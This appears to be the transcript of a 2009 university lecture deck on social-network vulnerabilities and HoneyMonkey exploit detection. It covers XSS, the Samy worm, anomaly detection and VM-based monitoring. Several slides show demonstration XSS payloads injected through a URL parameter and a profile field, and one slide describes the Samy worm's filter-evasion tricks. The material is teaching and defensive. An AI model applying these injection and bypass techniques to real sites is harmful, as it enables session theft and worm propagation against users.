osn vulnerabilities social honeymonkey november 23 2009 n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
OSN Vulnerabilities & Social HoneyMonkey November 23, 2009 PowerPoint Presentation
Download Presentation
OSN Vulnerabilities & Social HoneyMonkey November 23, 2009

Loading in 2 Seconds...

play fullscreen
1 / 70

OSN Vulnerabilities & Social HoneyMonkey November 23, 2009 - PowerPoint PPT Presentation


  • 228 Views
  • Uploaded on

OSN Vulnerabilities & Social HoneyMonkey November 23, 2009. S. Felix Wu Computer Science Department University of California, Davis http://www.cs.ucdavis.edu/~wu/ http://www.facebook.com/sfelixwu/ wu@cs.ucdavis.edu. ISN Vulnerabilities. Data/Information oriented attacks Privacy, Spyware

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'OSN Vulnerabilities & Social HoneyMonkey November 23, 2009' - licia


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
osn vulnerabilities social honeymonkey november 23 2009

OSN Vulnerabilities& Social HoneyMonkeyNovember 23, 2009

S. Felix Wu

Computer Science Department

University of California, Davis

http://www.cs.ucdavis.edu/~wu/

http://www.facebook.com/sfelixwu/

wu@cs.ucdavis.edu

ecs289m, Fall 2009

isn vulnerabilities
ISN Vulnerabilities
  • Data/Information oriented attacks
    • Privacy, Spyware
  • Control-flow oriented attacks
    • Trick you to execute something unexpected
    • E.g., samy worm

ecs289m, Fall 2009

slide3

target

site

Attacker

3

malicious

code

1

normal

interaction

“reflected”

code

4

2

From:

Malicious User

To:

Victim User

CLICK HERE

NORMAL

VALID

SESSION

security context:

target site

MALICIOUS

CODE

security context:

target site

5

email client

browser window

browser window

ecs289m, Fall 2009

reflected xss illustrated
reflected xss - illustrated

email/googleTalk/irc/etc.

*deAthL0rd420*

jen.innocent@good.com

Hey Jen, click on this link - itsa soooo good!!!?!

http://www.good.com/logon.jsp?uid=“><script>alert(‘xss’)</script>

ecs289m, Fall 2009

reflected xss illustrated1
reflected xss - illustrated

HTTP/HTTPS

www.good.com

jen.innocent@good.com

GET /logon.jsp?uid=“><script>alert(‘xss’)</script> HTTP/1.1

User-Agent: Lynx

Cookie: Session_Cookie: F24EX98H3L3GAW1;

ecs289m, Fall 2009

reflected xss illustrated2
reflected xss - illustrated

HTTP/HTTPS

www.good.com

jen.innocent@good.com

<html>

<body><form action=“logon.jsp”>

Logon Name: <input name=“uid”

value=“”><script>alert(‘xss’)</script>”>

</form></body>

</html>

ecs289m, Fall 2009

stored xss the arsenic in the well
stored xss – the arsenic in the well

attacker submits sticky (persisted) input to the app (e.g., blog comment/user profile)

i mention the input contains JS? whoops

later, some random peasant comes along and views the profile or blog comment

application displays comment/profile to user browser and JS inside it gets exec’d instead of displayed on browser

ecs289m, Fall 2009

stored xss illustrated
stored xss - illustrated

HTTP/HTTPS

*deAthL0rd420*

www.good.com

POST /setMyProfile.jsp HTTP/1.1

User-Agent: Lynx

Cookie: Session_Cookie: F24EX98H3L3GAW1;

profile=<script>alert(‘hi’)</script>

ecs289m, Fall 2009

stored xss illustrated1
stored xss - illustrated

HTTP/HTTPS

www.good.com

1st person to view

attacker’s profile

<html>

<body>

<div id=“profile”>This user’s profile:

<script>alert(‘hi’)</script>

2nd person to view

attacker’s profile

ecs289m, Fall 2009

the story of samy
the story of samy

myspace™ is one giant advertisement banner that has a hidden social networking site inside of it (like an easter egg)

you setup a profile, pics, etc. for other people to see

samy wanted an xss worm in his

own profile that made the reader

his friend and new source of worm

ecs289m, Fall 2009

the story of samy1
the story of samy

myspace did well not to let any JS through

samy used ‘java\nscript’ since ‘javascript’ was filtered out, String.fromCharCode(34) to generate a double quote, etc.

10 hours – 560 friends, 13 hours – 6400, 18 hours – 1,000,000, 19 hours – entire site is down

ecs289m, Fall 2009

topics
Topics
  • HoneyMonkey: a quick introduction
  • Why it works and why it won’t?
  • Four Technical Areas to worry about

ecs289m, Fall 2009

honeymonkey
HoneyMonkey

ecs289m, Fall 2009

the goal as i believe
The goal…as I believe…
  • Given an URL, will visiting this URL by a normal user cause any undesirable outcome?
    • JSRedir-R (GENO/Gumblar)
    • In-session Tracing (Phishing without emails)
    • Compromised Web browsers (& CSS)
    • Or , others…

ecs289m, Fall 2009

honeymonkey1
HoneyMonkey
  • Candidate URL’s
    • but which ones?
  • Possible vulnerable platforms
    • different levels of patches using Vmware-like
  • Policy to detect violations
    • Any status changes regarding new processes, registry, and unexpected file activities.

ecs289m, Fall 2009

honeymonkey2
HoneyMonkey

ecs289m, Fall 2009

browser vulnerability exploits
Browser vulnerability exploits…

Code

obfuscation

URL

redirection

Vulnerability

exploitation

Malware

installation

ecs289m, Fall 2009

code obfuscation
Code obfuscation…
  • Dynamic code injection – document.write() function inside a script.
  • Unreadable code – decoded using unescape() function.
  • Custom decoding routine.
  • Substring replacement using replace() function.

ecs289m, Fall 2009

url redirection
URL redirection…

Secondary URL

  • Primary URL
  • Protocol redirection using HTTP 302 temporary redirect.
  • HTML tags.
  • Script functions including window.location.replace().

ecs289m, Fall 2009

vulnerability exploitation
Vulnerability exploitation…
  • Exploiting of multiple browser vulnerabilities.
  • Owing to its popularity IE is attacked a lot.

Malware installation…

  • Introduce some piece of arbitrary code on the victim machine in order to achieve a larger attack goal.

ecs289m, Fall 2009

honeymonkey3
HoneyMonkey
  • Automatically detect and analyze a network of websites that exploit browsers.

ecs289m, Fall 2009

for facebook
For Facebook
  • Automated analyzing a large number of applications continuously
    • Especially for those being actively used.

ecs289m, Fall 2009

exploit detection system
Exploit detection system…
  • Stage 1 – scalable mode by visiting N-FBApps.
  • Stage 2 – perform recursive redirected analysis. (trying different functions)
  • Stage 3 – scan exploit URLs/APPs using fully patched VMs.

ecs289m, Fall 2009

exploit detection
Exploit detection
  • Executable files created or modified outside the browser sandbox folders.
  • Processes created.
  • Windows registry entries created or modified.
  • Vulnerability exploited.

ecs289m, Fall 2009

what are the issues
What are the issues?

ecs289m, Fall 2009

what are the issues1
What are the issues?
  • “Exploit Detection”

ecs289m, Fall 2009

exploit detection xml report
Exploit detection - XML report…
  • Executable files created or modified outside the browser sandbox folders.
  • Processes created.
  • Windows registry entries created or modified.
  • “Known” Vulnerability exploited.
  • Redirect-URLs visited.

ecs289m, Fall 2009

what are the issues2
What are the issues?
  • “Exploit Detection”
    • Antivirus, Wepawet (usually signature-based)
    • How about zero-day?
    • Maybe mixed scripting (could be very complicated) and kernel root kit…
    • Is there any easier way?

ecs289m, Fall 2009

how about osn
How about OSN?
  • How do we know that our social integrity has been altered?
  • How do we know that our profile/photos have been visited or copied?
    • History of access
  • How do we know that part of our profile has been interpreted as an executable script?
    • Pattern of propagation

ecs289m, Fall 2009

an idea of osn ids
An idea of OSN IDS
  • Amount of Social Resources consumed by a particular FB application
    • Friendship Network, trust and reputation, is utilized to conduct communication
    • We have a “expected model” for the usage of such resources ~ Anomaly detection

ecs289m, Fall 2009

statistic based anomaly detection sand
Statistic-based ANomaly Detection(SAND)
  • choose a parameter (a random variable hopefully without any assumption about its probabilistic distribution)
  • record its statistical “long-term” profile
  • check how much, quantitatively, its short-term behavior deviates from its long term profile
  • set the right threshold on the deviation to raise alarms

ecs289m, Fall 2009

slide35

timer control

update

decay

clean

long term profile

raw events

compute the

deviation

0

0

5

10

15

20

25

30

threshold control

alarm generation

ecs289m, Fall 2009

slide36

observed system events

SBL-based

Anomaly

Detection

model

update

the Model

model-based

event analysis

Example

Selection

analysis

reports

Explanation

Based

Learning

ecs289m, Fall 2009

and expand
AND  EXPAND
  • Anomaly Detection
    • Detect
    • Analysis and Explanation
    • Application

ecs289m, Fall 2009

challenges
Challenges
  • It might take a while before we realize the problem.
  • I.e., HoneyMonkey might not work well.
  • We probably should build an IDS for each FB profile.

ecs289m, Fall 2009

what are the issues3
What are the issues?
  • “Exploit Detection”
  • “Black List of scanning IP addresses”
    • Facebook Identifiers

ecs289m, Fall 2009

what are the issues4
What are the issues?
  • “Exploit Detection”
  • “Black List of scanning IP addresses”
    • The attacker knows what we, from which sets of IP addresses, are trying to accomplish.
    • There are techniques to detect whether we are using a virtual environment.

ecs289m, Fall 2009

what are the issues5
What are the issues?
  • “Exploit Detection”
  • “Black List of scanning IP addresses”
  • “Correlating Infections”

ecs289m, Fall 2009

what are the issues6
What are the issues?
  • “Exploit Detection”
  • “Black List of scanning IP addresses”
  • “Correlating Infections”
    • “I personally” haven’t seen it but…
    • Two URLs must be visited in sequence
    • Recursive/Redirect URL visits must be “stateful”!

ecs289m, Fall 2009

what are the issues7
What are the issues?
  • “Exploit Detection”
  • “Black List of scanning IP addresses”
  • “Correlating Infections”
  • “Capturing Human Interactions”
    • It might be hard to pretend to be a real human user though.

ecs289m, Fall 2009

what are the issues8
What are the issues?
  • “Exploit Detection”
  • “Black List of scanning IP addresses”
  • “Correlating Infections”
  • “Capturing Human Interactions”
  • “Choosing the Candidates”
    • This has been a critical issue to handle billions of possible URLs

ecs289m, Fall 2009

six issues
Six Issues
  • “Exploit Detection”
  • “Black List of scanning IP addresses”
  • “Correlating Infections”
  • “Capturing Human Interactions”
  • “Choosing the Candidates”
  • “Scalability and Parallelism”

ecs289m, Fall 2009

candidate url s
Candidate URL’s
  • HoneyMonkey’s approach
    • The initial bad list (host files and well known spyware holders)
    • Expanding/growing the list via methods such mutual referencing and redirection.
  • Others:
    • Spam and phishing emails
    • Special hotspot business websites such as pornography, illegal/pirated content sharing (P2P), and advertising sites (or local-intentional targets ~ financial and DoD’s websites).

ecs289m, Fall 2009

candidate url s1
Candidate URL’s
  • What are our objectives?
    • Regular Internet usages versus national security
  • Biased sampling
    • #’s of exploit provider groups is small. (~3)
    • This might be due to the sampling strategies (proof?)

ecs289m, Fall 2009

candidate url s2
Candidate URL’s
  • Yet, another approach…
    • Key-word based searching (using Google)
      • Those are how we get “infected” anyway!
    • MapReduce

ecs289m, Fall 2009

candidate url s3
Candidate URL’s
  • Yet, another approach…
    • Key-word based searching (using Google)
      • Those are how we get “infected” anyway!
    • MapReduce
      • URLs/Profiles as the keys
      • Links to “known” malicious pages as the value
      • We can quickly identify a large number of bad URLs (assuming that we are google).

ecs289m, Fall 2009

candidate url s4
Candidate URL’s
  • Yet, another approach…
    • Key-word based searching (using Google)
      • Those are how we get “infected” anyway!
    • MapReduce (still Baised)
    • Pure Keyword-based (frequency of the “keywords” entered by users)
      • Then, proportional to the frequency distribution, we sample a number of candidate pages returned from Google.
      • Plus and analyze all other external information.

ecs289m, Fall 2009

osn vulnerabilities
OSN Vulnerabilities
  • Browser
  • OSN service provider (e.g., Facebook.com)
    • Information router/firewall
  • OSN applications (e.g., goDaddy.com)

ecs289m, Fall 2009

slide53

A possible fundamental flaw of Facebook security design!

Is the application spreading the virus/worm?

Is the application accessing certain private information of yours?

e.g., why should the application look at my wall posts all the time!

ecs289m, Fall 2009

osn re direction arch
OSN Re-Direction Arch.

ecs289m, Fall 2009

proxy application
Proxy Application

Risk: Proxy might be malicious & risky!

Proxy Application

How to build up the trust?

ecs289m, Fall 2009

proxy dualism
Proxy Dualism

FAITH

FAITH (Facebook Application Identifier Translator & Hypervisor)

like NAT (Network Address Translation)

ecs289m, Fall 2009

software vulnerability
Software Vulnerability
  • Focus on Software Vulnerabilities
  • Two approaches
    • better software engineering
    • better vulnerabilities understanding

Practically, around the Internet, we currently have and will still have a large number of legacy software systems around for “quite a while.”

ecs289m, Fall 2009

vulnerability vs exploit
Vulnerability vs. Exploit
  • Vulnerability
    • the “weak” points in the software
    • applications or even the kernel itself
    • “control flow hijack” based on buffer overflow.
  • Exploit
    • the attack code utilizing one or more vulnerabilities

ecs289m, Fall 2009

slide60

UPR. LYR. PAYLOAD

TCP/UDP HDR

IP

NOP NOP

NOP NOP

Decryption

Code

Attack Code

Exploit

(ReturnAddr)

Focus on “Primitives” being used in the “Epsilon” phase!

Application dependent analysis

System State Changes

ecs289m, Fall 2009

vm monitoring
VM Monitoring

Best view of OS abstractions

Security solutions

Guest OS

Collaboration

VM

Security solutions

Isolation and

hardware extensibility

Host OS

HW

HW

ecs289m, Fall 2009

memory monitor
Memory Monitor

10

...

20

...

20

10

...

0

1024

0

Ethernet card memory

AL

Ethernet card memory

Physical memory

...

{1}

...

{1}

...

{2}

...

{2}

0

1024

0

Symbolic ethernet card memory

Symbolic physical memory

Symbolic ethernet card memory

Symbolic AL

ADD

20

...

10

...

30

...

AL

1024

2048

Union

Physical memory

{2}

...

{1}

...

{1,2}

...

1024

2048

Symbolic AL

Symbolic physical memory

ecs289m, Fall 2009

bezoar
Bezoar

Nondeterministic events

Detection

Log/Checkpoint/Replay

Attack notification

Recovery actions

Network packets

Memory Monitor

Malicious network source

notification

Recovery

Virtual Machine

ecs289m, Fall 2009

interface os vm
Interface OS-VM
  • OS -> VM:
    • Software interrupt:
      • use of vector number 15 that is not used (reserved) by Intel.
    • Parameters passed in general purpose registers;
    • Results returned by VM in general purpose register;
  • VM -> OS: exceptions.

ecs289m, Fall 2009

64

os vm communication
OS-VM Communication

User space

Kernel space

OS

CPU

VM

General Purpose Registers

Read

Write

OS Request Manager

Shadow Memory

ecs289m, Fall 2009

65

os vm communication1
OS-VM Communication

User space

Software interrupt

Kernel space

OS

CPU

VM

General Purpose Registers

Read

Write

OS Request Manager

Shadow Memory

ecs289m, Fall 2009

66

os vm communication2
OS-VM Communication

User space

Software interrupt

Kernel space

OS

CPU

VM

General Purpose Registers

Read

Write

OS Request Manager

Shadow Memory

ecs289m, Fall 2009

67

os vm communication3
OS-VM Communication

User space

Software interrupt

Kernel space

OS

CPU

VM

General Purpose Registers

Read

Write

OS Request Manager

Shadow Memory

ecs289m, Fall 2009

68

os vm communication4
OS-VM Communication

User space

Software interrupt

Kernel space

OS

CPU

VM

General Purpose Registers

Read

Write

OS Request Manager

Shadow Memory

ecs289m, Fall 2009

69

os vm communication5
OS-VM Communication

User space

Software interrupt

Kernel space

OS

CPU

VM

General Purpose Registers

Read

Write

OS Request Manager

Shadow Memory

ecs289m, Fall 2009

70